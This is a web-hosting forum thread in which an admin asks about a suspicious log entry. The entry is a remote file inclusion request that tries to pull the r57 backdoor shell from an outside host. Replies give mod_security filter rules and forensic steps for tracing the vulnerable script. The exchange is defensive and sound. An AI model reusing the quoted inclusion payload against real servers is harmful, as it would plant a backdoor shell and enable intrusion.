Anyone know what this actually does?

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
Does anyone know if this would actually do anything:


www.mydomain.com/randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt

I mean would that actually download any files to my server or anything like that?

I keep getting files in my tmp directory, but I can't find out where they are comming from. I've upgraded all software I am using, and removed any old versions like phpbb2 and such....


This is the only strange one I see in my log?
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
Use mod_security.

Add:

SecFilter "LOCAL_PATH"
SecFilter "r57shell\.txt"

Commom backdoor shell, securing tmp wont help, it can be easily run from perl.
 

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
HostMerit said:
Use mod_security.

Add:

SecFilter "LOCAL_PATH"
SecFilter "r57shell\.txt"

Commom backdoor shell, securing tmp wont help, it can be easily run from perl.
I am running mod security, so I will add those SecFilters. I'm still kind of new to the mod-security so I wasn't sure exactly how that worked. But if it is that easy to add the filters that is easy enough....

I'll give it a try.

Thanks,
 

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
HostMerit said:
I suggest checking out my mod security configuration, I've written alot of the rules myself, from scouring error logs, dom logs, recent exploits, etc, it's always updated.

I've also added rules based upon your attack

http://www.hostmerit.com/modsec.user.conf

Please let me know if you have any other questions :D

Thank you very much. I've added the SecFilters and then tried that URL and it said permission denied, so I think that is good.

Now we will see if that is what they were using to get the files in the tmp directory...
 

randomuser2

Member
Dec 23, 2005
23
0
151
You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

Next time/if it happens, run "stat" on the file(s) -- ie: stat /tmp/whatever.txt

and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perserverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.
 

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
randomuser2 said:
You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

Next time/if it happens, run "stat" on the file(s) -- ie: stat /tmp/whatever.txt

and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perserverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.
Thank you very much for the information. I will monitor the tmp directory and see if it happens again. I was still concerned about having an insecure script out there. This domain is using so many it is hard to find. Mabye doing what you said can help me track it down...
 

noimad1

Well-Known Member
Mar 27, 2003
626
0
166
randomuser2 said:
You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

Next time/if it happens, run "stat" on the file(s) -- ie: stat /tmp/whatever.txt

and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perserverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.

Ok, I got another one. So what logs exactly would you go through first?
 

HostMerit

Well-Known Member
Oct 24, 2004
163
0
166
New Jersey, USA
cPanel Access Level
DataCenter Provider
Try

grep "filename.txt" /usr/local/apache/domlogs/*

Quick and dirty but might help.

Also, ps -u nobody, look for anything anything except httpd, and possibly melange/chats running, things like perl, psybnc, etc etc.

Then take the process ID (pid) and cd /proc/(pid)

Then cat environ look for PWD (directory) or OLDPWD(last dir), also while in this dir ls -al, search for shortcuts back to the users directory, or where it sprouted from.